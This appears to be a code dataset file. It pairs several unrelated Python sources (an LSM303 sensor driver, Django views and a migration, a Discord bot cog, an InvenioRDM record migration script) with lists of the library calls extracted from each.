LSM303_REGISTER_ACCEL_STATUS_REG_A = const(0x27)
"""
LSM303_REGISTER_ACCEL_OUT_X_L_A = const(0x28)
"""
LSM303_REGISTER_ACCEL_FIFO_CTRL_REG_A = const(0x2E)
LSM303_REGISTER_ACCEL_FIFO_SRC_REG_A = const(0x2F)
LSM303_REGISTER_ACCEL_INT1_CFG_A = const(0x30)
LSM303_REGISTER_ACCEL_INT1_SOURCE_A = const(0x31)
LSM303_REGISTER_ACCEL_INT1_THS_A = const(0x32)
LSM303_REGISTER_ACCEL_INT1_DURATION_A = const(0x33)
LSM303_REGISTER_ACCEL_INT2_CFG_A = const(0x34)
LSM303_REGISTER_ACCEL_INT2_SOURCE_A = const(0x35)
LSM303_REGISTER_ACCEL_INT2_THS_A = const(0x36)
LSM303_REGISTER_ACCEL_INT2_DURATION_A = const(0x37)
LSM303_REGISTER_ACCEL_CLICK_CFG_A = const(0x38)
LSM303_REGISTER_ACCEL_CLICK_SRC_A = const(0x39)
LSM303_REGISTER_ACCEL_CLICK_THS_A = const(0x3A)
LSM303_REGISTER_ACCEL_TIME_LIMIT_A = const(0x3B)
LSM303_REGISTER_ACCEL_TIME_LATENCY_A = const(0x3C)
LSM303_REGISTER_ACCEL_TIME_WINDOW_A = const(0x3D)
"""
LSM303_ADDRESS_MAG = const(0x1E) # 0011110x
LSM303_REGISTER_MAG_CRA_REG_M = const(0x00)
LSM303_REGISTER_MAG_CRB_REG_M = const(0x01)
LSM303_REGISTER_MAG_MR_REG_M = const(0x02)
LSM303_REGISTER_MAG_OUT_X_H_M = const(0x03)
"""
LSM303_REGISTER_MAG_OUT_X_L_M = const(0x04)
LSM303_REGISTER_MAG_OUT_Z_H_M = const(0x05)
LSM303_REGISTER_MAG_OUT_Z_L_M = const(0x06)
LSM303_REGISTER_MAG_OUT_Y_H_M = const(0x07)
LSM303_REGISTER_MAG_OUT_Y_L_M = const(0x08)
LSM303_REGISTER_MAG_SR_REG_Mg = const(0x09)
LSM303_REGISTER_MAG_IRA_REG_M = const(0x0A)
LSM303_REGISTER_MAG_IRB_REG_M = const(0x0B)
LSM303_REGISTER_MAG_IRC_REG_M = const(0x0C)
LSM303_REGISTER_MAG_TEMP_OUT_H_M = const(0x31)
LSM303_REGISTER_MAG_TEMP_OUT_L_M = const(0x32)
MAG_GAIN_1_3 = const(0x20) # +/- 1.3
MAG_GAIN_1_9 = const(0x40) # +/- 1.9
MAG_GAIN_2_5 = const(0x60) # +/- 2.5
MAG_GAIN_4_0 = const(0x80) # +/- 4.0
MAG_GAIN_4_7 = const(0xA0) # +/- 4.7
MAG_GAIN_5_6 = const(0xC0) # +/- 5.6
MAG_GAIN_8_1 = const(0xE0) # +/- 8.1
MAG_RATE_0_7 = const(0x00) # 0.75 H
MAG_RATE_1_5 = const(0x01) # 1.5 Hz
MAG_RATE_3_0 = const(0x62) # 3.0 Hz
MAG_RATE_7_5 = const(0x03) # 7.5 Hz
MAG_RATE_15 = const(0x04) # 15 Hz
MAG_RATE_30 = const(0x05) # 30 Hz
MAG_RATE_75 = const(0x06) # 75 Hz
MAG_RATE_220 = const(0x07) # 210 Hz
"""
ACCEL_MS2_PER_LSB = 0.00980665 # meters/second^2 per least significant bit
GAUSS_TO_MICROTESLA = 100.0
class LSM303(object):
"LSM303 3-axis accelerometer/magnetometer"
def __init__(self, i2c, hires=True):
"Initialize the sensor"
self._bus = i2c
# Enable the accelerometer - all 3 channels
self._bus.write_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_CTRL_REG1_A,
[0b01000111])
# Select hi-res (12-bit) or low-res (10-bit) output mode.
# Low-res mode uses less power and sustains a higher update rate,
# output is padded to compatible 12-bit units.
if hires:
self._bus.write_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_CTRL_REG4_A,
[0b00001000])
else:
self._bus.write_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_CTRL_REG4_A,
[0b00000000])
# Enable the magnetometer (Continuous-conversion mode)
self._bus.write_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_MR_REG_M,
[0b00000000])
# MODIFIED : Added block: Disable temperature sensor, minimum data rate: 220Hz
self._bus.write_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_CRA_REG_M,
[0b00011100])
# MODIFIED : Added block: Set mag gain to +-1.3
self._bus.write_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_CRB_REG_M,
[0b00100000])
# MODIFIED : Added block: Instead of 'self.set_mag_gain(MAG_GAIN_1_3)'
self._lsb_per_gauss_xy = const(1100)
self._lsb_per_gauss_z = const(980)
def read_accel(self):
"Read raw acceleration in meters/second squared"
# Read as signed 12-bit little endian values
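        # OR-ing 0x80 into the register address sets the ST auto-increment bit
        # so all six output bytes are read in one transaction.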
accel_bytes = self._bus.read_i2c_block_data(LSM303_ADDRESS_ACCEL,
LSM303_REGISTER_ACCEL_OUT_X_L_A | 0x80,
6)
# MODIFIED : struct.unpack -> method import + unpack()
accel_raw = unpack('<hhh', bytearray(accel_bytes))
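        # Samples are left-justified 12-bit values inside 16-bit words, so
        # shift right by 4 before scaling to m/s^2.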
return (
(accel_raw[0] >> 4) * ACCEL_MS2_PER_LSB,
(accel_raw[1] >> 4) * ACCEL_MS2_PER_LSB,
(accel_raw[2] >> 4) * ACCEL_MS2_PER_LSB,
)
# MODIFIED: excluded methods: set_mag_gain(self, gain), set_mag_rate(self, rate)
def read_mag(self):
"Read raw magnetic field in microtesla"
# Read as signed 16-bit big endian values
mag_bytes = self._bus.read_i2c_block_data(LSM303_ADDRESS_MAG,
LSM303_REGISTER_MAG_OUT_X_H_M,
6)
# MODIFIED : struct.unpack -> method import + unpack()
mag_raw = unpack('>hhh', bytearray(mag_bytes))
# MODIFIED : Seems like vectors are not swapped on my chip. (ICSG019A by ICStation.com)
return (
mag_raw[0] / self._lsb_per_gauss_xy * GAUSS_TO_MICROTESLA,
mag_raw[1] / self._lsb_per_gauss_xy * GAUSS_TO_MICROTESLA, # MODIFIED : mag_raw[2] -> mag_raw[1]
mag_raw[2] / self._lsb_per_gauss_z * GAUSS_TO_MICROTESLA, # MODIFIED : mag_raw[1] -> mag_raw[2]
)
# MODIFIED: excluded method _test()
|
[
"micropython.const"
] |
[((1570, 1579), 'micropython.const', 'const', (['(24)'], {}), '(24)\n', (1575, 1579), False, 'from micropython import const\n'), ((1638, 1647), 'micropython.const', 'const', (['(32)'], {}), '(32)\n', (1643, 1647), False, 'from micropython import const\n'), ((1814, 1823), 'micropython.const', 'const', (['(35)'], {}), '(35)\n', (1819, 1823), False, 'from micropython import const\n'), ((2102, 2111), 'micropython.const', 'const', (['(40)'], {}), '(40)\n', (2107, 2111), False, 'from micropython import const\n'), ((3063, 3072), 'micropython.const', 'const', (['(30)'], {}), '(30)\n', (3068, 3072), False, 'from micropython import const\n'), ((3130, 3138), 'micropython.const', 'const', (['(0)'], {}), '(0)\n', (3135, 3138), False, 'from micropython import const\n'), ((3186, 3194), 'micropython.const', 'const', (['(1)'], {}), '(1)\n', (3191, 3194), False, 'from micropython import const\n'), ((3242, 3250), 'micropython.const', 'const', (['(2)'], {}), '(2)\n', (3247, 3250), False, 'from micropython import const\n'), ((3298, 3306), 'micropython.const', 'const', (['(3)'], {}), '(3)\n', (3303, 3306), False, 'from micropython import const\n'), ((6925, 6936), 'micropython.const', 'const', (['(1100)'], {}), '(1100)\n', (6930, 6936), False, 'from micropython import const\n'), ((6970, 6980), 'micropython.const', 'const', (['(980)'], {}), '(980)\n', (6975, 6980), False, 'from micropython import const\n')]
|
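A minimal usage sketch for the LSM303 driver above. It assumes a Linux host with the smbus2 package (whose SMBus object exposes the write_i2c_block_data/read_i2c_block_data methods the class expects) and that it runs in the same module as the driver, which already imports const and unpack earlier in the file; the bus number and printed format are illustrative assumptions, not part of the original code.

# Hypothetical usage sketch for the driver above (assumes smbus2 on a Linux host).
from smbus2 import SMBus

bus = SMBus(1)                          # assumed I2C bus number; depends on the board
sensor = LSM303(bus, hires=True)

ax, ay, az = sensor.read_accel()       # meters/second^2
mx, my, mz = sensor.read_mag()         # microtesla
print("accel: %.2f %.2f %.2f  mag: %.1f %.1f %.1f" % (ax, ay, az, mx, my, mz))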
# Generated by Django 2.2.12 on 2020-05-12 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting_common", "0022_auto_20200505_1707")]
operations = [migrations.DeleteModel(name="SIUnitScale")]
|
[
"django.db.migrations.DeleteModel"
] |
[((212, 254), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""SIUnitScale"""'}), "(name='SIUnitScale')\n", (234, 254), False, 'from django.db import migrations\n')]
|
import discord
import operator
import datetime
import os
import re
import asyncio
import aiohttp
from discord.ext import commands
from __main__ import send_cmd_help, user_allowed
from cogs.utils import checks
from cogs.utils.dataIO import dataIO
from cogs.utils.chat_formatting import box, pagify, escape_mass_mentions
from random import choice
from copy import deepcopy
from cogs.utils.settings import Settings
import PIL
from PIL.Image import core as _imaging
from PIL import Image
#try:
#from PIL import Image
#PIL = True
#except:
#PIL = False
__author__ = "Ordinator"
def plain_uname(user: discord.Member=None):
if user:
name = user.display_name
uid = user.id
nick = user.name
pat = '(?<=^b\').*?(?=\'$)'
#trim = unidecode.unidecode(name)
trim = str(unidecode(user.display_name).encode('ascii', 'ignore'))
#trim = str(name.encode('ascii', 'ignore'))
trim = ' '.join(re.findall(pat,trim)).strip()
#trim = "``\n**UID**: {} \n**Type**: {} \n**Name**: {}\n**Name No-Emote**: {} \n**Pattern**: {} \n``".format(uid, nick, name, trim, pat)
return trim
else:
return ""
def titlecase(s, exceptions=['a', 'an', 'of', 'the', 'is']):
word_list = re.split(' ', s) # re.split behaves as expected
final = [word_list[0].capitalize()]
for word in word_list[1:]:
final.append(word if word in exceptions else word.capitalize())
return " ".join(final)
class Ordcustom:
"""Custom stuff from Ordinator"""
def __init__(self, bot):
self.bot = bot
self.allemojis = []
self.update_all_emoji_list()
def _role_from_string(self, server, rolename, roles=None):
if roles is None:
roles = server.roles
roles = [r for r in roles if r is not None]
role = discord.utils.find(lambda r: r.name.lower() == rolename.lower(),
roles)
return role
async def attempt_cleanup(self, messages):
try:
if len(messages) > 1:
await self.bot.delete_messages(messages)
else:
await self.bot.delete_message(messages[0])
except:
pass
def update_all_emoji_list(self):
self.allemojis = self.bot.get_all_emojis()
return
async def get_emojis_from_message(self, message):
celserver = self.bot.get_server("99607063012843520")
if not message.server == celserver:
return
strin = message.content
if not strin:
return
pnglist = []
repat = re.compile(r"<:([^:]*):(\d*)>", re.IGNORECASE)
#https://cdn.discordapp.com/emojis/306256699134705665.png
path = r"data/ordcustom/emojis/"
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
msg_iter = repat.finditer(strin)
for match in msg_iter:
emoji_name = match.group(1)
emoji_id = match.group(2)
url = "https://cdn.discordapp.com/emojis/{}.png".format(emoji_id)
full_filename_path = path+"{}.{}".format(emoji_name, url[-3:])
pnglist.append(full_filename_path)
try:
async with aiohttp.get(url, headers=option) as r:
emote = await r.read()
with open(full_filename_path, 'wb') as f:
f.write(emote)
except Exception as e:
print(e)
return
if pnglist and len(pnglist) > 1:
ims = "data/ordcustom/" + self.imgprocess(pnglist)
await self.bot.send_file(message.channel, ims)
elif pnglist:
await self.bot.send_file(message.channel, pnglist[0])
def is_command(self, msg):
for m in self.bot.settings.get_prefixes(msg.server):
if msg.content.startswith(m):
return True
return False
def elaborate_response(self, trigger, r):
if trigger.owner != settings.owner:
return "text", r
if not r.startswith("file:"):
return "text", r
else:
path = r.replace("file:", "").strip()
path = os.path.join("data", "trigger", "files", path)
print(path)
if os.path.isfile(path):
return "file", path
else:
return "text", r
async def on_server_emojis_update(self, before, after):
if (before or after):
oldnotinnew = list(set(before) - set(after))
newnotinold = list(set(after) - set(before))
#server = discord.utils.get(discord.client.servers, name='GamerCeleste')
#server = before.server
if (len(before) == 0):
if (len(after) == 0):
return
else:
server = after[0].server
else:
server = before[0].server
oldstr = '\nAn emoji has been removed from this server:\t'
newstr = '\nA new emoji has just been added:\t'
msg = ""
if (len(oldnotinnew) > 0):
#stuff deleted
oldnotinnew.sort(key=operator.attrgetter('name'))
for e in oldnotinnew:
oldstr = oldstr + str(e) + '\t`:' + e.name + ':`\n' + e.url
msg = oldstr
if (len(newnotinold) > 0):
#stuff added
newnotinold.sort(key=operator.attrgetter('name'))
for e in newnotinold:
newstr = newstr + str(e) + '\t`:' + e.name + ':`\n' + e.url
msg = newstr
if msg:
return #await self.bot.send_message(server, msg)
async def on_message(self, message):
channel = message.channel
author = message.author
celserver = self.bot.get_server("99607063012843520")
if self.is_command(message):
return
if message.server is None:
return
if author == self.bot.user:
return
if not user_allowed(message):
return
if (message.clean_content == "CEASE ALL MOTOR FUNCTIONS"):
await self.bot.add_reaction(message, u"\U0001F480")
return await self.bot.send_message(channel, "As you wish.")
await self.get_emojis_from_message(message)
if ("poop".lower() in message.content.lower().split()):
await self.bot.add_reaction(message, u"\U0001F4A9")
if message.server == celserver:
if ("shit".lower() in message.content.lower().split()):
await self.bot.add_reaction(message, u"\U0001F4A9")
modchan = discord.utils.find(lambda c: "mods" in c.name, celserver.channels)
musicchan = discord.utils.find(lambda c: "requests" in c.name, celserver.channels)
newschan = discord.utils.find(lambda c: "announcements" in c.name, celserver.channels)
genchan = discord.utils.find(lambda c: "general" in c.name, celserver.channels)
devchan = discord.utils.find(lambda c: "bot-dev" in c.name, celserver.channels)
#COPY MESSAGES FROM #ANNOUNCEMENTS custom code:
if (channel == newschan):
return await self.bot.send_message(genchan, "New Announcement: " + message.content)
#AUTO-MODERATE words custom code:
if ("amber".lower() in message.content.lower().split()):
await self.bot.delete_message(message)
if message.channel != musicchan:
await self.bot.send_message(modchan, "The following message by " + message.author.mention + " in the " + message.channel.mention + " channel was deleted for containing the \"*A word*\" in it:\n\n" + message.content)
# await self.bot.send_message(message.author, "You have had a message automatically deleted in the **" + message.server.name + "** server. \nIf you need more info please contact a moderator or admin")
return
@commands.command(pass_context=True)
async def emoji(self, ctx):
"""Lists all emoji's on this server"""
message = ctx.message
channel = message.channel
allemo = ''
emolist = message.server.emojis
emolist.sort(key=operator.attrgetter('name'))
for e in message.server.emojis:
allemo = allemo + '' + str(e) + '\t`:' + e.name + ':`\n'
await self.bot.send_message(channel, "\nEmotes\nAll **" + message.server.name + "** Emojis: \n\n" + allemo)
return
@commands.command(pass_context=True)
async def testmessage(self, ctx):
await self.bot.say(ctx.message.clean_content.upper())
botmem = discord.utils.find(lambda m: m.name == self.bot.user.name, ctx.message.channel.server.members)
botnick = self.bot.user.display_name
if botmem.nick:
botnick = botmem.nick
await self.bot.say(botnick)
await self.bot.say(ctx.message.clean_content.replace(botnick,""))
@commands.command(no_pm=True, pass_context=True)
@checks.admin_or_permissions(manage_roles=True)
async def saychan(self, ctx, sendchan=None, sendmsg=None):
"""Sends text to a specified channel,
saychan <channel> <message>"""
author = ctx.message.author
channel = ctx.message.channel
server = ctx.message.server
        if ctx.message is None:
return
if sendmsg is None:
return
if sendchan is None:
return
return await self.bot.send_message(sendchan, sendmsg)
@commands.command(no_pm=True, pass_context=True)
@checks.admin_or_permissions(manage_roles=True)
async def rolebulk(self, ctx, method, rolename, message=None):
"""Adds a role to multiple users,
        rolebulk <add/remove> <"rolename"> <@mention1, @mention2, ...>
Role name must be in quotes if there are spaces."""
author = ctx.message.author
channel = ctx.message.channel
server = ctx.message.server
if message is None:
return
if method.lower() not in {"add", "remove"}:
return await self.bot.say('You must specify either "add" or "remove"')
if (method.lower() == "add"):
addbool = True
else:
addbool = False
role = self._role_from_string(server, rolename)
#try:
# self.bot.say("Role {} found from rolename {}".format(
# role.name, rolename))
#except:
# log.debug("Role not found for rolename {}".format(rolename))
if role is None:
await self.bot.say('That role cannot be found.')
return
allnames = ctx.message.mentions
if len(allnames) < 1:
return await self.bot.say('Please mention users; no user mentions were found in the command')
if not channel.permissions_for(server.me).manage_roles:
await self.bot.say('I don\'t have manage_roles.')
return
for mem in allnames:
if addbool:
await self.bot.add_roles(mem, role)
else:
                await self.bot.remove_roles(mem, role)
return await self.bot.say('Complete')
@commands.command(no_pm=True, pass_context=True)
@checks.admin_or_permissions(manage_roles=True)
async def rolemerge(self, ctx, rolename, rolename2):
"""Adds a role to multiple users,
rolebulk <add/remove> <"rollname"> <@mention1, @mention2, ...>
Role name must be in quotes if there are spaces."""
message = ctx.message
author = ctx.message.author
channel = ctx.message.channel
server = ctx.message.server
if message is None:
return
role = self._role_from_string(server, rolename)
role2 = self._role_from_string(server, rolename2)
#try:
# self.bot.say("Role {} found from rolename {}".format(
# role.name, rolename))
#except:
# log.debug("Role not found for rolename {}".format(rolename))
if role is None:
await self.bot.say('That role cannot be found.')
return
if role2 is None:
await self.bot.say('That role cannot be found.')
return
if not channel.permissions_for(server.me).manage_roles:
await self.bot.say('I don\'t have manage_roles.')
return
allnames = server.members
for mem in allnames:
memrole = discord.utils.find(role2, mem.roles)
if memrole:
add_roles(mem, role)
remove_roles(role2, mem)
return await self.bot.say('Complete')
def imgprocess(self, listed):
images = [Image.open(i) for i in listed]
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_height = max(heights)
new_im = Image.new("RGBA", (total_width, max_height))
x_offset = 0
for im in images:
new_im.paste(im, (x_offset, 0))
x_offset += im.size[0]
cat = "test.png"
new_im.save("data/ordcustom/" + cat)
return cat
def check_folders():
paths = ("data/ordcustom", "data/ordcustom/emojis")
for path in paths:
if not os.path.exists(path):
print("Creating {} folder...".format(path))
os.makedirs(path)
def setup(bot):
check_folders()
bot.add_cog(Ordcustom(bot))
|
[
"PIL.Image.new",
"re.split",
"discord.ext.commands.command",
"discord.utils.find",
"__main__.user_allowed",
"os.makedirs",
"os.path.exists",
"PIL.Image.open",
"cogs.utils.checks.admin_or_permissions",
"os.path.isfile",
"operator.attrgetter",
"re.findall",
"aiohttp.get",
"os.path.join",
"re.compile"
] |
[((1258, 1274), 're.split', 're.split', (['""" """', 's'], {}), "(' ', s)\n", (1266, 1274), False, 'import re\n'), ((8317, 8352), 'discord.ext.commands.command', 'commands.command', ([], {'pass_context': '(True)'}), '(pass_context=True)\n', (8333, 8352), False, 'from discord.ext import commands\n'), ((8866, 8901), 'discord.ext.commands.command', 'commands.command', ([], {'pass_context': '(True)'}), '(pass_context=True)\n', (8882, 8901), False, 'from discord.ext import commands\n'), ((9376, 9423), 'discord.ext.commands.command', 'commands.command', ([], {'no_pm': '(True)', 'pass_context': '(True)'}), '(no_pm=True, pass_context=True)\n', (9392, 9423), False, 'from discord.ext import commands\n'), ((9429, 9475), 'cogs.utils.checks.admin_or_permissions', 'checks.admin_or_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (9456, 9475), False, 'from cogs.utils import checks\n'), ((10015, 10062), 'discord.ext.commands.command', 'commands.command', ([], {'no_pm': '(True)', 'pass_context': '(True)'}), '(no_pm=True, pass_context=True)\n', (10031, 10062), False, 'from discord.ext import commands\n'), ((10068, 10114), 'cogs.utils.checks.admin_or_permissions', 'checks.admin_or_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (10095, 10114), False, 'from cogs.utils import checks\n'), ((11764, 11811), 'discord.ext.commands.command', 'commands.command', ([], {'no_pm': '(True)', 'pass_context': '(True)'}), '(no_pm=True, pass_context=True)\n', (11780, 11811), False, 'from discord.ext import commands\n'), ((11817, 11863), 'cogs.utils.checks.admin_or_permissions', 'checks.admin_or_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (11844, 11863), False, 'from cogs.utils import checks\n'), ((2652, 2698), 're.compile', 're.compile', (['"""<:([^:]*):(\\\\d*)>"""', 're.IGNORECASE'], {}), "('<:([^:]*):(\\\\d*)>', re.IGNORECASE)\n", (2662, 2698), False, 'import re\n'), ((4383, 4429), 'os.path.join', 'os.path.join', (['"""data"""', '"""trigger"""', '"""files"""', 'path'], {}), "('data', 'trigger', 'files', path)\n", (4395, 4429), False, 'import os\n'), ((4461, 4481), 'os.path.isfile', 'os.path.isfile', (['path'], {}), '(path)\n', (4475, 4481), False, 'import os\n'), ((9036, 9135), 'discord.utils.find', 'discord.utils.find', (['(lambda m: m.name == self.bot.user.name)', 'ctx.message.channel.server.members'], {}), '(lambda m: m.name == self.bot.user.name, ctx.message.\n channel.server.members)\n', (9054, 9135), False, 'import discord\n'), ((13516, 13560), 'PIL.Image.new', 'Image.new', (['"""RGBA"""', '(total_width, max_height)'], {}), "('RGBA', (total_width, max_height))\n", (13525, 13560), False, 'from PIL import Image\n'), ((6233, 6254), '__main__.user_allowed', 'user_allowed', (['message'], {}), '(message)\n', (6245, 6254), False, 'from __main__ import send_cmd_help, user_allowed\n'), ((6936, 7002), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'mods' in c.name)", 'celserver.channels'], {}), "(lambda c: 'mods' in c.name, celserver.channels)\n", (6954, 7002), False, 'import discord\n'), ((7027, 7097), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'requests' in c.name)", 'celserver.channels'], {}), "(lambda c: 'requests' in c.name, celserver.channels)\n", (7045, 7097), False, 'import discord\n'), ((7121, 7196), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'announcements' in c.name)", 'celserver.channels'], {}), "(lambda c: 'announcements' in c.name, celserver.channels)\n", (7139, 7196), False, 'import discord\n'), 
((7219, 7288), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'general' in c.name)", 'celserver.channels'], {}), "(lambda c: 'general' in c.name, celserver.channels)\n", (7237, 7288), False, 'import discord\n'), ((7311, 7380), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'bot-dev' in c.name)", 'celserver.channels'], {}), "(lambda c: 'bot-dev' in c.name, celserver.channels)\n", (7329, 7380), False, 'import discord\n'), ((13082, 13118), 'discord.utils.find', 'discord.utils.find', (['role2', 'mem.roles'], {}), '(role2, mem.roles)\n', (13100, 13118), False, 'import discord\n'), ((13343, 13356), 'PIL.Image.open', 'Image.open', (['i'], {}), '(i)\n', (13353, 13356), False, 'from PIL import Image\n'), ((13893, 13913), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (13907, 13913), False, 'import os\n'), ((13983, 14000), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (13994, 14000), False, 'import os\n'), ((8581, 8608), 'operator.attrgetter', 'operator.attrgetter', (['"""name"""'], {}), "('name')\n", (8600, 8608), False, 'import operator\n'), ((955, 976), 're.findall', 're.findall', (['pat', 'trim'], {}), '(pat, trim)\n', (965, 976), False, 'import re\n'), ((3403, 3435), 'aiohttp.get', 'aiohttp.get', (['url'], {'headers': 'option'}), '(url, headers=option)\n', (3414, 3435), False, 'import aiohttp\n'), ((5346, 5373), 'operator.attrgetter', 'operator.attrgetter', (['"""name"""'], {}), "('name')\n", (5365, 5373), False, 'import operator\n'), ((5605, 5632), 'operator.attrgetter', 'operator.attrgetter', (['"""name"""'], {}), "('name')\n", (5624, 5632), False, 'import operator\n')]
|
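The imgprocess method near the end of the cog stitches the downloaded emoji images into one horizontal strip; below is a stand-alone sketch of that concatenation idea with Pillow. The function name and file names are made up for illustration.

# Stand-alone sketch of the horizontal image concatenation used by imgprocess.
from PIL import Image

def hconcat(paths, out_path="combined.png"):
    images = [Image.open(p) for p in paths]              # open every input image
    widths, heights = zip(*(im.size for im in images))
    canvas = Image.new("RGBA", (sum(widths), max(heights)))
    x = 0
    for im in images:
        canvas.paste(im, (x, 0))                          # place each image after the previous one
        x += im.size[0]
    canvas.save(out_path)
    return out_path

# hconcat(["emoji_a.png", "emoji_b.png"])  # hypothetical file names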
from switchlang import switch
from django.conf import settings
from django.http import Http404
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import View
class PageNotFoundView(View):
"""
Fallback view for the dispatch helper below.
All this view does is return a 404, and its sole purpose is decluttering the
dispatch helper view defined below.
By using it as the default value for parameters to dispatch, dispatch doesn't have
to explicitly account for omitted classes, and can just call the as_view method.
"""
def dispatch(self, request, *args, **kwargs):
raise Http404()
@csrf_exempt
def dispatch(
request,
main_class=PageNotFoundView,
cms_class=PageNotFoundView,
short_class=PageNotFoundView,
**kwargs,
):
"""
Delegate to the correct class based on the current site.
This helper view allows the user to delegate the request to the correct class based
on the current site. This allows for different apps with their own needs to "share"
URLs when appropriate.
Each of the "_class" params corresponds to a view class for the desired app.
"""
with switch(request.site.domain) as app:
app.case(settings.FULL_DOMAINS, lambda: main_class)
app.case(settings.SHORT_DOMAINS, lambda: short_class)
app.default(lambda: cms_class)
return app.result.as_view()(request, **kwargs)
|
[
"switchlang.switch",
"django.http.Http404"
] |
[((644, 653), 'django.http.Http404', 'Http404', ([], {}), '()\n', (651, 653), False, 'from django.http import Http404\n'), ((1184, 1211), 'switchlang.switch', 'switch', (['request.site.domain'], {}), '(request.site.domain)\n', (1190, 1211), False, 'from switchlang import switch\n')]
|
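One plausible way to wire the dispatch helper above into a URLconf is to pass the per-app view classes as extra keyword arguments to the URL pattern; the module paths, view classes, and route below are illustrative assumptions only.

# Hypothetical urls.py wiring for the dispatch helper (names and route are made up).
from django.urls import path

from .views import dispatch                    # wherever the helper above lives (assumed)
from main_app.views import MainPageView        # assumed per-app class-based views
from cms_app.views import CmsPageView
from shortener.views import ShortLinkView

urlpatterns = [
    path(
        "<slug:slug>/",
        dispatch,
        {
            "main_class": MainPageView,
            "cms_class": CmsPageView,
            "short_class": ShortLinkView,
        },
    ),
]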
# -*- coding: utf-8 -*-
#
# Copyright (C) 2022 CERN.
#
# Invenio-App-RDM is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Record migration script from InvenioRDM 8.0 to 9.0.
Disclaimer: This script is intended to be executed *only once*, namely when
upgrading from InvenioRDM 8.0 to 9.0!
If this script is executed at any other time, probably the best case scenario
is that nothing happens!
"""
from click import echo, secho
from invenio_db import db
from invenio_rdm_records.records.api import RDMRecord
def execute_upgrade():
"""Execute the upgrade from InvenioRDM 8.0 to 9.0.
Please read the disclaimer on this module before thinking about executing
this function!
"""
def update_funding_field(record):
try:
echo(f"Updating record: {record['id']}... ", nl=False)
for funding in record.metadata.get("funding", []):
award = funding.get("award", {})
funder = funding.get("funder", {})
if award.get("identifier") and award.get("scheme"):
award_identifier = award.pop("identifier")
award_scheme = award.pop("scheme")
funding["award"]["identifiers"] = [
{"identifier": award_identifier, "scheme": award_scheme}
]
if funder.get("identifier") and funder.get("scheme"):
funder.pop("identifier")
funder.pop("scheme")
if award.get("title", ""):
award_title = award.pop("title")
funding["award"]["title"] = {"en": award_title}
if funder.get("title", ""):
funder.pop("title")
secho("OK", fg="green")
return record
except Exception as e:
secho("Error {}".format(repr(e)), fg="red")
return None
errors = []
records = RDMRecord.model_cls.query.all()
for record in records:
r = RDMRecord(record.data, model=record)
r["$schema"] = "local://records/record-v5.0.0.json"
res = update_funding_field(r)
if res is None:
errors.append("Record {} failed to update funding".format(r.id))
else:
r = res
r.commit()
success = not errors
if success:
echo(f"Commiting to DB", nl=True)
db.session.commit()
secho(
"Data migration completed, please rebuild the search indices now.",
fg="green",
)
else:
echo(f"Rollback", nl=True)
db.session.rollback()
secho(
"Upgrade aborted due to the following errors:",
fg="red",
err=True,
)
for error in errors:
secho(error, fg="red", err=True)
msg = (
"The changes have been rolled back. "
"Please fix the above listed errors and try the upgrade again",
)
secho(msg, fg="yellow", err=True)
# if the script is executed on its own, perform the upgrade
if __name__ == "__main__":
execute_upgrade()
|
[
"invenio_rdm_records.records.api.RDMRecord.model_cls.query.all",
"click.echo",
"invenio_db.db.session.commit",
"invenio_db.db.session.rollback",
"click.secho",
"invenio_rdm_records.records.api.RDMRecord"
] |
[((2016, 2047), 'invenio_rdm_records.records.api.RDMRecord.model_cls.query.all', 'RDMRecord.model_cls.query.all', ([], {}), '()\n', (2045, 2047), False, 'from invenio_rdm_records.records.api import RDMRecord\n'), ((2087, 2123), 'invenio_rdm_records.records.api.RDMRecord', 'RDMRecord', (['record.data'], {'model': 'record'}), '(record.data, model=record)\n', (2096, 2123), False, 'from invenio_rdm_records.records.api import RDMRecord\n'), ((2431, 2464), 'click.echo', 'echo', (['f"""Commiting to DB"""'], {'nl': '(True)'}), "(f'Commiting to DB', nl=True)\n", (2435, 2464), False, 'from click import echo, secho\n'), ((2473, 2492), 'invenio_db.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2490, 2492), False, 'from invenio_db import db\n'), ((2501, 2590), 'click.secho', 'secho', (['"""Data migration completed, please rebuild the search indices now."""'], {'fg': '"""green"""'}), "('Data migration completed, please rebuild the search indices now.',\n fg='green')\n", (2506, 2590), False, 'from click import echo, secho\n'), ((2641, 2667), 'click.echo', 'echo', (['f"""Rollback"""'], {'nl': '(True)'}), "(f'Rollback', nl=True)\n", (2645, 2667), False, 'from click import echo, secho\n'), ((2676, 2697), 'invenio_db.db.session.rollback', 'db.session.rollback', ([], {}), '()\n', (2695, 2697), False, 'from invenio_db import db\n'), ((2706, 2779), 'click.secho', 'secho', (['"""Upgrade aborted due to the following errors:"""'], {'fg': '"""red"""', 'err': '(True)'}), "('Upgrade aborted due to the following errors:', fg='red', err=True)\n", (2711, 2779), False, 'from click import echo, secho\n'), ((3063, 3096), 'click.secho', 'secho', (['msg'], {'fg': '"""yellow"""', 'err': '(True)'}), "(msg, fg='yellow', err=True)\n", (3068, 3096), False, 'from click import echo, secho\n'), ((844, 898), 'click.echo', 'echo', (['f"""Updating record: 